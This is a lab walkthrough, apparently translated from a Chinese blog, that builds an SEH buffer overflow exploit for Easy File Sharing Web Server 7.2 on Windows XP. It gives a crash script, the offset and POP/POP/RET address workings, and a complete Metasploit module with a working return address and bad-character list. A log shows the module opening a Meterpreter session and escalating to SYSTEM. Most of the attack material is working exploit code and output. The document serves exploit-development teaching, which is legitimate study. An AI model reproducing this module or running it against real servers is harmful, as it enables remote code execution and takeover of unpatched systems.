Implementing an SEH-based buffer overflow with Metasploit
I. Lab environment
1. Attacker
kali 2019-3
Download: https://www.kali.org/get-kali/
2. Target
winXPSP3 (English version)
3. Vulnerable software
Easy File Sharing Web Server 7.2
4. Setting up the lab
Download Easy File Sharing Web Server 7.2 yourself (search Baidu) and install it on XP.
II. Computing the offset
1. Use the pattern_create tool
root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_create.rb -l 10000 > 10000.txt
2. Create the buffer overflow script exploit.py
The pattern has to be placed in the request line, i.e. in the form "HEAD " + pattern + " HTTP/1.0\r\n\r\n".
(1) exploit.py
# Exploit Title: Easy File Sharing Web Server 7.2 - HEAD HTTP request SEH Buffer Overflow
# Date: 2019-01-16
# Exploit Author: binghe
# Version: 7.2
# Tested on: XP SP3 EN
# category: Remote Exploit
# Usage: ./exploit.py ip port
# (print() and .encode() keep the script working under both Python 2 and Python 3)

import socket
import sys

host = str(sys.argv[1])
port = int(sys.argv[2])

a = socket.socket()
print("Connecting to: " + host + ":" + str(port))
a.connect((host, port))

# Next SEH: the cyclic pattern that will overwrite the SEH record
buff = "<pattern generated by Metasploit's pattern_create.rb>"

# HEAD request: the pattern goes into the request line, between "HEAD " and " HTTP/1.0"
a.send(("HEAD " + buff + " HTTP/1.0\r\n\r\n").encode("latin-1"))
a.close()
print("Done...")
- Paste the pattern generated by Metasploit's pattern_create.rb (the contents of 10000.txt) into the `buff = "<pattern generated by Metasploit's pattern_create.rb>"` line.
- Script source: https://blog.csdn.net/l1028386804/article/details/86506457
(2) Run the overflow script on Kali to test it
root@kali:~/Desktop# python exploit.py 10.10.10.131 90
Connecting to: 10.10.10.131:90
Done...
root@kali:~/Desktop#
(3) Check the state of Easy File Sharing Web Server 7.2 on the target
On the target you can see that Easy File Sharing Web Server 7.2 has exited because of the buffer overflow, which shows that our overflow script exploit.py works.
3. Start Easy File Sharing Web Server 7.2 again and attach the process in Immunity Debugger
4. Run the overflow script
root@kali:~/Desktop# python exploit.py 10.10.10.131 90
Connecting to: 10.10.10.131:90
Done...
root@kali:~/Desktop#
5. Read the overwritten SEH values in Easy File Sharing Web Server 7.2
After the access violation, the SEH handler (the "catch block" in the book's terminology) has been overwritten with 46356646 and the next-SEH pointer with 34664633. Both values can be read in Immunity Debugger's SEH chain view; each is four characters of the pattern interpreted as a little-endian dword.
6. Use the pattern_offset tool
(1) Compute the offset of the catch block (SEH handler)
root@binghe:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 46356646 -l 10000
[*] Exact match at offset 4065
(2) Compute the offset of the next-SEH record
root@binghe:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 34664633 -l 10000
[*] Exact match at offset 4061
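To make clear what pattern_offset.rb is doing with the two dwords above, here is an added Python reimplementation of pattern_create.rb and pattern_offset.rb (example code written for this page, not part of the original post or of Metasploit). The pattern generation follows Metasploit's "Aa0Aa1Aa2..." scheme (upper, lower, digit, last position cycling fastest); an 8-hex-digit query is converted to little-endian bytes first, because that is how the four characters were laid out in memory when they were read as an address. The function seh_offsets additionally checks the sanity condition that the handler pointer sits exactly 4 bytes after the next-SEH pointer.

```python
import re
import string
import struct


def pattern_create(length):
    """Metasploit-style cyclic pattern "Aa0Aa1Aa2..." (upper, lower, digit).
    One full cycle is 26*26*10*3 = 20280 bytes; longer patterns repeat the
    cycle, as Rex::Text.pattern_create does."""
    cycle = "".join(u + l + d
                    for u in string.ascii_uppercase
                    for l in string.ascii_lowercase
                    for d in string.digits)
    reps = length // len(cycle) + 1
    return (cycle * reps)[:length]


def query_to_bytes(query):
    """pattern_offset.rb accepts either the 4 pattern characters or an
    8-hex-digit dword. A dword is unpacked little-endian, because the CPU
    read the overwritten pointer from memory that way."""
    if re.fullmatch(r"(0x)?[0-9a-fA-F]{8}", query):
        return struct.pack("<I", int(query, 16)).decode("latin-1")
    return query


def pattern_offset(query, length=10000):
    """Offset of query inside a pattern of the given length, or -1 if absent."""
    return pattern_create(length).find(query_to_bytes(query))


def seh_offsets(handler_dword, nseh_dword, length=10000):
    """Offsets of the two fields of the overwritten EXCEPTION_REGISTRATION
    record. The handler pointer must sit exactly 4 bytes after the next-SEH
    pointer; anything else means one of the values was misread."""
    handler = pattern_offset(handler_dword, length)
    nseh = pattern_offset(nseh_dword, length)
    if handler < 0 or nseh < 0:
        raise ValueError("value not found in pattern")
    if handler - nseh != 4:
        raise ValueError("handler and nSEH offsets are not 4 bytes apart: "
                         "%d / %d" % (handler, nseh))
    return nseh, handler


if __name__ == "__main__":
    # The two values read from the crash on this page
    print(pattern_offset("46356646"))            # 4065 (SEH handler)
    print(pattern_offset("34664633"))            # 4061 (next SEH)
    print(seh_offsets("46356646", "34664633"))   # (4061, 4065)
```

Run it with no arguments; it reproduces the 4065 and 4061 reported by pattern_offset.rb, and the 4-byte distance between them is exactly why the module later uses 4061 as its offset.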
III. Finding a POP/POP/RET address
1. The Mona script
Download: https://github.com/corelan/mona
Copy mona.py into the PyCommands directory that sits next to ImmunityDebugger.exe.
2. Run Mona
At the Immunity Debugger command line enter "!mona modules" to have Mona analyse the loaded DLLs. The listing shows each module's protections (Rebase, SafeSEH, ASLR, NXCompat); the POP/POP/RET address for the SEH handler must come from a module with these off, such as the server's own ImageLoad.dll used in the next step.
3. Use msfbinscan to find POP/POP/RET addresses
msf5 > msfbinscan -p /home/kali/Desktop/ImageLoad.dll
[*] exec: msfbinscan -p /home/kali/Desktop/ImageLoad.dll

[/home/kali/Desktop/ImageLoad.dll]
0x1000108b pop ebp; pop ebx; ret
0x10001274 pop ebp; pop ebx; ret
0x10001877 pop esi; pop ebx; ret
0x100018e0 pop esi; pop ebx; ret
0x10001d9f pop ebp; pop ebx; ret
0x100026e1 pop edi; pop ebx; ret
0x1000283e pop edi; pop esi; ret
0x100028ab pop edi; pop esi; ret
0x100029b5 pop esi; pop ebx; ret
0x10002b9b pop ebp; pop ebx; ret
…………
0x1002379d pop ebp; pop ebx; ret
0x100237cc pop ebp; pop ebx; ret
0x100237dc pop ebp; pop ebx; ret
0x10023945 pop edi; pop esi; ret
0x1002483f pop esi; pop ebx; ret
0x100248be pop esi; pop ebx; ret
0x100248ce pop esi; pop ebx; ret
0x100248df pop esi; pop ebx; ret
Address selection: discard every address whose little-endian bytes contain a character that the HTTP parser will mangle or truncate (the module's bad characters, for example 0x00, 0x20, 0x2f, 0x2e). All of the 0x1000xxxx addresses contain a 0x00 byte and are therefore unusable.
Here 0x1002379d is taken as the POP/POP/RET address (bytes 9d 37 02 10, none of them bad).
IV. Writing the Metasploit SEH exploit module
1. Exploit code (final version)
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SEH Overflow Easy File Sharing HTTP Server 7.2',
      'Description'    => %q(
        This module demonstrates an SEH-based overflow example
      ),
      'Author'         => 'z9m8r8',
      'License'        => MSF_LICENSE,
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'RPORT'    => 80,
        },
      'Payload'        =>
        {
          'Space'    => 390,
          'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x1002379d, 'Offset' => 4061 } ],
        ],
      'DisclosureDate' => '2021-09-26',
      'DefaultTarget'  => 0
    ))
  end

  def exploit
    connect

    weapon  = "HEAD "                         # request method, note the trailing space
    weapon << make_nops(target['Offset'])     # 4061 bytes of filler up to the next-SEH field
    weapon << generate_seh_record(target.ret) # nSEH (short jump) + handler (POP/POP/RET address)
    weapon << make_nops(19)                   # small sled the short jump lands in
    weapon << payload.encoded                 # shellcode
    weapon << " HTTP/1.0\r\n\r\n"             # leading space, then end of the request

    sock.put(weapon)
    handler
    disconnect
  end
end
Note: there is a space after HEAD and a space before HTTP!!!
2. Brief code analysis
(1) Target
- The Ret (return address) field holds the address of the POP/POP/RET instructions, 0x1002379d.
- The Offset field holds the offset, 4061.
- 4061 is used instead of 4065 because Metasploit writes both fields of the SEH record itself: it places a short jump to the shellcode where the next-SEH pointer used to be (offset 4061) and puts the POP/POP/RET address 4 bytes later, at 4065, where the handler pointer was. So the offset handed to the module is that of the next-SEH field, 4 bytes before the handler.
(2) exploit
- generate_seh_record(target.ret) returns the 8-byte record: a 2-byte short jump that skips the remaining 6 bytes (2 bytes of padding plus the 4-byte POP/POP/RET address). When the exception fires, POP/POP/RET returns execution to the next-SEH field, the jump is taken, and execution continues right after the record.
- Next, 19 NOPs are placed in front of the payload as a small sled, so the jump does not have to land exactly on the first payload byte and nothing in between disturbs the payload.
- " HTTP/1.0\r\n\r\n" closes the request line and terminates the request.
- Finally, the data held in weapon is sent to the target with sock.put.
- handler then starts the payload handler and waits for a session. If the exploit worked, we get control of the target.
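The address-selection rule from section III and the buffer layout described in the analysis above can be checked offline. The following is an added Python model of the request the module builds; it is example code written for this page, not Metasploit's own implementation. It assumes that generate_seh_record lays the record out as a 2-byte short jump (EB 06), 2 bytes of padding and the little-endian handler address, uses a constructed subset of the msfbinscan addresses as candidates, and stands in a placeholder byte string for the real payload.

```python
import struct

# BadChars exactly as declared in the module above
BADCHARS = b"\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"

# Constructed subset of the POP/POP/RET addresses listed by msfbinscan
PPR_CANDIDATES = [0x1000108b, 0x10001274, 0x10001877, 0x10002b9b,
                  0x1002379d, 0x100237cc, 0x10023945, 0x1002483f]


def has_badchars(data, badchars=BADCHARS):
    """True if any byte of data is in the bad-character list."""
    return any(b in badchars for b in data)


def usable_ppr(candidates, badchars=BADCHARS):
    """Keep only addresses whose little-endian encoding is free of bad
    characters. Every 0x1000xxxx address fails because its third byte is 0x00."""
    return [a for a in candidates
            if not has_badchars(struct.pack("<I", a), badchars)]


def seh_record(ret):
    """8-byte replacement for the EXCEPTION_REGISTRATION record (assumed layout
    of Msf::Exploit::Seh#generate_seh_record):
      nSEH    = EB 06  jmp short +6, over the padding and the handler pointer
                90 90  padding
      handler = POP/POP/RET address, little-endian"""
    return b"\xeb\x06" + b"\x90\x90" + struct.pack("<I", ret)


def build_request(offset, ret, shellcode, sled=19):
    """'HEAD ' + filler up to nSEH + SEH record + NOP sled + shellcode + tail,
    the same order as the module's exploit method."""
    return (b"HEAD " + b"\x90" * offset + seh_record(ret)
            + b"\x90" * sled + shellcode + b" HTTP/1.0\r\n\r\n")


def check_layout(request, offset, ret, badchars=BADCHARS):
    """Verify what the debugger should see: the short jump at offset, the handler
    4 bytes later, the jump landing on the sled, and no bad characters anywhere
    between the method and the HTTP version."""
    base = len(b"HEAD ")
    body = request[base:request.rindex(b" HTTP/1.0")]
    rec = request[base + offset: base + offset + 8]
    return {
        "nseh_is_short_jmp": rec[0:2] == b"\xeb\x06",
        "handler_at_plus_4": struct.unpack("<I", rec[4:8])[0] == ret,
        "jmp_lands_in_sled": request[base + offset + 8] == 0x90,
        "body_clean": not has_badchars(body, badchars),
    }


if __name__ == "__main__":
    print(["0x%08x" % a for a in usable_ppr(PPR_CANDIDATES)])
    shellcode = b"\xcc" * 32      # constructed placeholder, not a real payload
    req = build_request(4061, 0x1002379d, shellcode)
    print(check_layout(req, 4061, 0x1002379d))
    # A 0x1000xxxx address puts a NUL into the request line and fails body_clean
    print(check_layout(build_request(4061, 0x1000108b, shellcode),
                       4061, 0x1000108b)["body_clean"])
```

Running it prints only the 0x1002xxxx candidates as usable, an all-true layout check for 0x1002379d, and False for 0x1000108b, which is the concrete reason behind "exclude addresses with zeros" in section III.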
3. Problems hit while debugging the code
root@kali:/usr/share/metasploit-framework/tools/dev# ./msftidy.rb /usr/share/metasploit-framework/modules/exploits/windows/z9m8r8_test/seh_attack_by_z9m8r8.rb
/usr/share/metasploit-framework/modules/exploits/windows/z9m8r8_test/seh_attack_by_z9m8r8.rb - [WARNING] Explicitly requiring/loading msf/core is not necessary   # fix: delete the require 'msf/core' line
/usr/share/metasploit-framework/modules/exploits/windows/z9m8r8_test/seh_attack_by_z9m8r8.rb - [INFO] No CVE references found. Please check before you land!
/usr/share/metasploit-framework/modules/exploits/windows/z9m8r8_test/seh_attack_by_z9m8r8.rb - [ERROR] Incorrect disclosure date format   # correct: 2021-09-26, wrong: 2021-9-26
/usr/share/metasploit-framework/modules/exploits/windows/z9m8r8_test/seh_attack_by_z9m8r8.rb - [WARNING] Please use 'MetasploitModule' as the class name (you used Metasploit4)   # fix: rename Metasploit4 to MetasploitModule
/usr/share/metasploit-framework/modules/exploits/windows/z9m8r8_test/seh_attack_by_z9m8r8.rb:27 - [WARNING] Spaces at EOL
root@kali:/usr/share/metasploit-framework/tools/dev#
4. Test run in msf
root@kali:/# msfconsole
…………
…………
msf5 > use exploit/windows/z9m8r8_test/seh_attack_by_z9m8r8
msf5 exploit(windows/z9m8r8_test/seh_attack_by_z9m8r8) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(windows/z9m8r8_test/seh_attack_by_z9m8r8) > set rhost 10.10.10.131
rhost => 10.10.10.131
msf5 exploit(windows/z9m8r8_test/seh_attack_by_z9m8r8) > set rport 90
rport => 90
msf5 exploit(windows/z9m8r8_test/seh_attack_by_z9m8r8) > exploit

[*] Started bind TCP handler against 10.10.10.131:4444
[*] Sending stage (179779 bytes) to 10.10.10.131
[*] Meterpreter session 1 opened (10.10.10.148:38999 -> 10.10.10.131:4444) at 2021-09-25 22:16:28 -0400

meterpreter > getuid
Server username: DH-CA8822AB9589\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
References:
Mastering Metasploit, 2nd edition (Chinese edition: 《精通Metasploit渗透测试 第2版》)
https://blog.csdn.net/l1028386804/article/details/86506457
Stay true to your original aspiration, and you will reach the end.